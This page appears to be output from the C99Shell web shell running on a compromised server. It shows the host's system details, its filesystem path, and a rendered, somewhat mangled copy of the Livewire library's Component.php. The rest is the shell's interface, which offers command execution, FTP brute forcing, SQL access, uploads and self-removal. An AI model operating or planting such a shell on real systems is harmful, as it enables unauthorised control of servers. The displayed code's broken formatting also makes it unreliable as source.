!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/livewire/livewire/src/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Component.php (3.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Livewire;

use 
Livewire\Features\SupportDisablingBackButtonCache\HandlesDisablingBackButtonCache;
use 
Livewire\Features\SupportPageComponents\HandlesPageComponents;
use 
Livewire\Features\SupportJsEvaluation\HandlesJsEvaluation;
use 
Livewire\Features\SupportAttributes\HandlesAttributes;
use 
Livewire\Features\SupportValidation\HandlesValidation;
use 
Livewire\Features\SupportStreaming\HandlesStreaming;
use 
Livewire\Features\SupportRedirects\HandlesRedirects;
use 
Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use 
Livewire\Features\SupportEvents\HandlesEvents;
use 
Livewire\Exceptions\PropertyNotFoundException;
use 
Livewire\Concerns\InteractsWithProperties;
use 
Illuminate\Support\Traits\Macroable;
use 
BadMethodCallException;
use 
Livewire\Features\SupportFormObjects\HandlesFormObjects;

abstract class 
Component
{
    use 
Macroable __call as macroCall; }

    use 
AuthorizesRequests;
    use 
InteractsWithProperties;
    use 
HandlesEvents;
    use 
HandlesRedirects;
    use 
HandlesStreaming;
    use 
HandlesAttributes;
    use 
HandlesValidation;
    use 
HandlesFormObjects;
    use 
HandlesJsEvaluation;
    use 
HandlesPageComponents;
    use 
HandlesDisablingBackButtonCache;

    protected 
$__id;
    protected 
$__name;

    function 
id()
    {
        return 
$this->getId();
    }

    function 
setId($id)
    {
        
$this->__id $id;
    }

    function 
getId()
    {
        return 
$this->__id;
    }

    function 
setName($name)
    {
        
$this->__name $name;
    }

    function 
getName()
    {
        return 
$this->__name;
    }

    function 
skipRender($html null)
    {
        
store($this)->set('skipRender'$html ?: true);
    }

    function 
skipMount()
    {
        
store($this)->set('skipMount'true);
    }

    function 
skipHydrate()
    {
        
store($this)->set('skipHydrate'true);
    }

    function 
__isset($property)
    {
        try {
            
$value $this->__get($property);

            if (isset(
$value)) {
                return 
true;
            }
        } catch(
PropertyNotFoundException $ex) {}

        return 
false;
    }

    function 
__get($property)
    {
        
$value 'noneset';

        
$returnValue = function ($newValue) use (&$value) {
            
$value $newValue;
        };

        
$finish trigger('__get'$this$property$returnValue);

        
$value $finish($value);

        if (
$value === 'noneset') {
            throw new 
PropertyNotFoundException($property$this->getName());
        }

        return 
$value;
    }

    function 
__unset($property)
    {
        
trigger('__unset'$this$property);
    }

    function 
__call($method$params)
    {
        
$value 'noneset';

        
$returnValue = function ($newValue) use (&$value) {
            
$value $newValue;
        };

        
$finish trigger('__call'$this$method$params$returnValue);

        
$value $finish($value);

        if (
$value !== 'noneset') {
            return 
$value;
        }

        if (static::
hasMacro($method)) {
            return 
$this->macroCall($method$params);
        }

        throw new 
BadMethodCallException(sprintf(
            
'Method %s::%s does not exist.', static::class, $method
        
));
    }

    public function 
tap($callback)
    {
        
$callback($this);

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--